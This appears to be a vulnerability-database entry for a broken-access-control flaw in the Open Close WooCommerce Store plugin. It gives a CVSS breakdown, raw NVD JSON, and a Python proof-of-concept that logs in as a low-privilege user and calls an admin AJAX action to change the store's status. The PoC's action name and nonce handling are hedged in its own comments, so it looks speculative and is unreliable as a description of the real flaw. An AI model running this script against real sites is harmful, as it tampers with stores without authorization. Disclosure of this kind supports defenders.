Security Vulnerability Report
中文
CVE-2025-62935 CVSS 4.3 MEDIUM

CVE-2025-62935

Published: 2025-10-27 02:15:53
Last Modified: 2026-04-27 17:16:36

Description

Missing Authorization vulnerability in StackWC Open Close WooCommerce Store woc-open-close allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Open Close WooCommerce Store: from n/a through <= 5.0.0.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Open Close WooCommerce Store (woc-open-close) <= 5.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62935 PoC - Open Close WooCommerce Store Broken Access Control #!/usr/bin/env python3 import requests import sys # Configuration target_url = "http://target-wordpress-site.com" username = "attacker_account" password = "attacker_password" # Login to WordPress session = requests.Session() login_url = f"{target_url}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": "/wp-admin/", "testcookie": "1" } print("[*] Logging in to WordPress...") response = session.post(login_url, data=login_data, cookies=session.cookies) if "wordpress_logged_in" not in str(session.cookies): print("[-] Login failed!") sys.exit(1) print("[+] Login successful!") # Exploit the missing authorization vulnerability # Target the plugin's AJAX handler ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Change store status (exploit the broken access control) exploit_data = { "action": "woc_open_close_save_status", # Plugin-specific action "store_status": "closed", # Modify store status "nonce": "", # May not be properly validated } print("[*] Exploiting missing authorization vulnerability...") response = session.post(ajax_url, data=exploit_data) if response.status_code == 200: print("[+] Exploit sent successfully!") print(f"[*] Response: {response.text[:200]}") else: print(f"[-] Exploit failed with status code: {response.status_code}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62935", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:53.380", "lastModified": "2026-04-27T17:16:35.680", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in StackWC Open Close WooCommerce Store woc-open-close allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Open Close WooCommerce Store: from n/a through <= 5.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woc-open-close/vulnerability/wordpress-open-close-woocommerce-store-plugin-4-9-8-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}